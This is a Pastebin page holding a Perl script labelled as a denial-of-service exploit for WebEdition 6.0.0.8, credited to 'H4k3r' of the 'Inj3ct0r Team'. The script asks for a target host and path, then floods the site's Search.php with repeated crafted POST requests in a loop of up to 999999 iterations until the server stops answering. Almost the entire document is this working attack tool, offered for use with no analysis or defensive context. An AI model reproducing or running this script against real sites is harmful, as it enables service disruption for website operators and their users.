Advertisement
saifulfaizan

try3

Nov 1st, 2011
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.74 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. use IO::Socket;
  4.  
  5. print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
  6. print "+       WebEdition V6.0.0.8 D.O.S Exploit       +\n";
  7. print "+               (C)oded by H4k3r                +\n";
  8. print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
  9. print "Host |without http://www.| ";
  10. chomp($host = <STDIN>);
  11. print "Path |example. /en or / | ";
  12. chomp($pth = <STDIN>);
  13.     {
  14.     while($x != 999999)
  15.         {
  16.         $postit = "?we_lv_search_content_search=H4k3r+Pwnz0rz+From+Inj3ct0r+Team&we_from_search_content_search=1";
  17.         $lrg = length $postit;
  18.         my $sock = new IO::Socket::INET (
  19.                                     PeerAddr => "$host",
  20.                                     PeerPort => "80",
  21.                                     Proto => "tcp",
  22.                                     );
  23.         die "\nOffline! - We can not Connect To '$host' it May be DoSed\n" unless $sock;
  24.    
  25.         print $sock "POST $pth/Search.php HTTP/1.1\n";
  26.         print $sock "Host: $host\n";
  27.         print $sock "Accept:  text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
  28.         print $sock "Referer: $host\n";
  29.         print $sock "Accept-Language: en-us\n";
  30.         print $sock "Content-Type: application/x-www-form-urlencoded\n";
  31.         print $sock "Accept-Encoding: gzip, deflate\n";
  32.         print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
  33.         print $sock "Connection: Keep-Alive\n";
  34.         print $sock "Cache-Control: no-cache\n";
  35.         print $sock "Content-Length: $lrg\n\n";
  36.         print $sock "$postit\n";
  37.         close($sock);
  38.         syswrite STDOUT, "Online! ";
  39.         $x++;
  40.         }
  41.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement